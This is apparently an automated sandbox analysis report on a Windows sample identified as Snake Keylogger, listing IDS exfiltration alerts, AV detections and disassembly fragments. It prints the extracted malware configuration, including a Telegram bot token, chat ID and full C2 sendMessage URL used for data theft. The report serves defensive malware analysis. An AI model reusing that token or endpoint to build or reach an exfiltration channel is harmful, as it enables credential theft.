2024-09-27T12:52:41.529225+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49729	149.154.167.220	443	TCP
2024-09-27T12:52:42.672141+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49730	149.154.167.220	443	TCP
2024-09-27T12:52:44.705385+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49731	149.154.167.220	443	TCP
2024-09-27T12:52:45.606191+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49732	149.154.167.220	443	TCP
2024-09-27T12:52:46.527653+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49733	149.154.167.220	443	TCP
2024-09-27T12:52:47.515650+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49734	149.154.167.220	443	TCP
2024-09-27T12:52:48.484540+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49735	149.154.167.220	443	TCP
2024-09-27T12:52:49.398461+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49736	149.154.167.220	443	TCP
2024-09-27T12:52:51.106303+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49737	149.154.167.220	443	TCP
2024-09-27T12:52:52.142440+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49738	149.154.167.220	443	TCP
2024-09-27T12:52:53.062571+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49739	149.154.167.220	443	TCP
2024-09-27T12:52:53.983957+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49740	149.154.167.220	443	TCP
2024-09-27T12:52:54.920916+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49741	149.154.167.220	443	TCP
2024-09-27T12:52:55.913444+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49742	149.154.167.220	443	TCP
2024-09-27T12:52:56.825753+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49743	149.154.167.220	443	TCP
2024-09-27T12:52:57.707006+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49744	149.154.167.220	443	TCP
2024-09-27T12:52:58.614916+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49745	149.154.167.220	443	TCP
2024-09-27T12:52:59.536114+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49746	149.154.167.220	443	TCP
2024-09-27T12:53:00.657309+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49747	149.154.167.220	443	TCP
2024-09-27T12:53:02.582793+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49748	149.154.167.220	443	TCP
2024-09-27T12:53:03.633269+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49750	149.154.167.220	443	TCP
2024-09-27T12:53:05.655751+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49751	149.154.167.220	443	TCP
2024-09-27T12:53:06.735672+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49752	149.154.167.220	443	TCP
2024-09-27T12:53:08.007836+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49753	149.154.167.220	443	TCP
2024-09-27T12:53:09.233527+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49754	149.154.167.220	443	TCP
2024-09-27T12:53:10.370931+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49755	149.154.167.220	443	TCP
2024-09-27T12:53:11.307745+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49756	149.154.167.220	443	TCP
2024-09-27T12:53:20.500609+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49757	149.154.167.220	443	TCP
2024-09-27T12:53:21.525554+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49758	149.154.167.220	443	TCP
2024-09-27T12:53:22.513829+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49759	149.154.167.220	443	TCP
2024-09-27T12:53:23.617361+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49760	149.154.167.220	443	TCP
2024-09-27T12:53:24.907619+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49761	149.154.167.220	443	TCP
2024-09-27T12:53:27.280546+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49762	149.154.167.220	443	TCP
2024-09-27T12:53:28.929540+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49763	149.154.167.220	443	TCP
2024-09-27T12:53:29.853357+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49764	149.154.167.220	443	TCP
2024-09-27T12:53:30.767781+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49765	149.154.167.220	443	TCP
2024-09-27T12:53:31.704387+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49766	149.154.167.220	443	TCP
2024-09-27T12:53:32.668848+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49767	149.154.167.220	443	TCP
2024-09-27T12:53:33.590275+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49768	149.154.167.220	443	TCP
2024-09-27T12:53:35.082306+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49769	149.154.167.220	443	TCP
2024-09-27T12:53:36.002788+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49770	149.154.167.220	443	TCP
2024-09-27T12:53:36.956561+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49771	149.154.167.220	443	TCP
2024-09-27T12:53:37.886814+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49772	149.154.167.220	443	TCP
2024-09-27T12:53:38.796577+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49773	149.154.167.220	443	TCP
2024-09-27T12:53:39.800944+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49774	149.154.167.220	443	TCP
2024-09-27T12:53:41.197627+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49775	149.154.167.220	443	TCP
2024-09-27T12:53:42.487547+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49776	149.154.167.220	443	TCP
2024-09-27T12:53:43.425505+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49777	149.154.167.220	443	TCP
2024-09-27T12:53:44.350153+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49778	149.154.167.220	443	TCP
2024-09-27T12:53:45.934379+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49779	149.154.167.220	443	TCP
2024-09-27T12:53:46.986929+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49780	149.154.167.220	443	TCP
2024-09-27T12:53:47.922276+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49781	149.154.167.220	443	TCP
2024-09-27T12:53:48.784943+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49782	149.154.167.220	443	TCP
2024-09-27T12:53:49.745410+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49783	149.154.167.220	443	TCP
2024-09-27T12:53:50.673710+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49784	149.154.167.220	443	TCP
2024-09-27T12:53:51.647226+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49785	149.154.167.220	443	TCP
2024-09-27T12:53:52.584720+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49786	149.154.167.220	443	TCP
2024-09-27T12:53:54.213958+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49787	149.154.167.220	443	TCP
2024-09-27T12:53:55.164647+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49788	149.154.167.220	443	TCP
2024-09-27T12:53:56.115432+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49789	149.154.167.220	443	TCP
2024-09-27T12:53:56.995918+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49790	149.154.167.220	443	TCP
2024-09-27T12:53:58.164241+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49791	149.154.167.220	443	TCP
2024-09-27T12:53:59.549323+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49792	149.154.167.220	443	TCP
2024-09-27T12:54:00.862924+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49793	149.154.167.220	443	TCP
2024-09-27T12:54:01.749412+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49794	149.154.167.220	443	TCP
2024-09-27T12:54:03.121663+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49795	149.154.167.220	443	TCP
2024-09-27T12:54:04.822220+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49796	149.154.167.220	443	TCP
2024-09-27T12:54:05.716951+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49797	149.154.167.220	443	TCP
2024-09-27T12:54:06.618867+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49798	149.154.167.220	443	TCP
2024-09-27T12:54:07.555750+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49799	149.154.167.220	443	TCP
2024-09-27T12:54:08.560156+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49800	149.154.167.220	443	TCP
2024-09-27T12:54:10.449602+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49801	149.154.167.220	443	TCP
2024-09-27T12:54:11.411855+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49802	149.154.167.220	443	TCP
2024-09-27T12:54:12.345692+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49803	149.154.167.220	443	TCP
2024-09-27T12:54:21.537666+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49804	149.154.167.220	443	TCP
2024-09-27T12:54:22.741291+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49805	149.154.167.220	443	TCP
2024-09-27T12:54:23.891743+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49806	149.154.167.220	443	TCP
2024-09-27T12:54:24.961306+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49807	149.154.167.220	443	TCP
2024-09-27T12:54:26.020688+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49808	149.154.167.220	443	TCP
2024-09-27T12:54:27.126627+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49809	149.154.167.220	443	TCP
2024-09-27T12:54:28.271057+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49810	149.154.167.220	443	TCP
2024-09-27T12:54:29.417458+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49811	149.154.167.220	443	TCP
2024-09-27T12:54:30.527303+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49812	149.154.167.220	443	TCP
2024-09-27T12:54:31.479634+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49813	149.154.167.220	443	TCP
2024-09-27T12:54:32.428226+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49814	149.154.167.220	443	TCP
2024-09-27T12:54:33.346730+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49815	149.154.167.220	443	TCP
2024-09-27T12:54:34.462613+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49816	149.154.167.220	443	TCP
2024-09-27T12:54:35.541339+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49817	149.154.167.220	443	TCP
2024-09-27T12:54:40.052626+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49818	149.154.167.220	443	TCP
2024-09-27T12:54:54.520068+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49819	149.154.167.220	443	TCP
2024-09-27T12:55:45.695621+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49820	149.154.167.220	443	TCP
2024-09-27T12:56:03.823752+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49821	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc", "Chat_id": "-4209622687", "Version": "5.1"}
Source: .05.2024.exe.1424.10.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendMessage"}

Multi AV Scanner detection for submitted file

Source: .05.2024.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: .05.2024.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: .05.2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49730 version: TLS 1.2

Source: .05.2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C9AADh	10_2_064C9770
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C68F1h	10_2_064C6648
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C88B9h	10_2_064C8610
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C9169h	10_2_064C8EC0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C71A1h	10_2_064C6EF8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C2151h	10_2_064C1EA8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C2A01h	10_2_064C2758
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C7A51h	10_2_064C77A8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C7EA9h	10_2_064C7C00
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C0741h	10_2_064C0498
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064CA5EAh	10_2_064CA4B7
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C0FF1h	10_2_064C0D48
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064CA5EAh	10_2_064CA540
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C18A1h	10_2_064C15F8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C1CF9h	10_2_064C1A50
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C8D11h	10_2_064C8A68
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C6D49h	10_2_064C6AA0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C75F9h	10_2_064C7350
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C25A9h	10_2_064C2300
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C95C1h	10_2_064C9318
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C2E59h	10_2_064C2BB0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C02E9h	10_2_064C0040
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C0B99h	10_2_064C08F0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C832Bh	10_2_064C8080
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C6471h	10_2_064C61C8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064C1449h	10_2_064C11A0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D3640h	10_2_064D3228
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DE961h	10_2_064DE6B8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D0D0Eh	10_2_064D0B30
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D1698h	10_2_064D0B30
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D1AF9h	10_2_064D1848
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D2C79h	10_2_064D29C8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DE509h	10_2_064DE260
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DE0B1h	10_2_064DDE08
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DF211h	10_2_064DEF68
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DEDB9h	10_2_064DEB10
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DF669h	10_2_064DF3C0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_064D0040
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DFAC1h	10_2_064DF818
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D1F59h	10_2_064D1CA8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DD801h	10_2_064DD558
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D3640h	10_2_064D356E
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D2819h	10_2_064D2568
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D23B9h	10_2_064D2108
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DD3A9h	10_2_064DD100
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064D3640h	10_2_064D31F7
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4x nop then jmp 064DDC59h	10_2_064DD9B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49727 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49756 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49740 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49728 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49737 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49734 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49762 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49806 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49769 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49724 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49771 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49754 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49776 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49746 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49726 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49736 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49765 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49763 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49741 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49750 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49730 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49812 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49729 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49744 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49757 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49798 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49766 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49738 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49780 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49807 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49742 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49725 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49735 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49759 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49814 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49761 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49767 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49753 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49775 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49784 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49788 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49768 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49792 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49797 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49748 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49813 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49787 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49751 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49782 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49820 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49800 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49770 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49755 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49731 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49801 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49752 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49747 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49739 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49796 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49811 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49758 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49774 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49809 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49781 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49799 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49760 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49773 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49789 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49804 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49786 -> 149.154.167.220:443
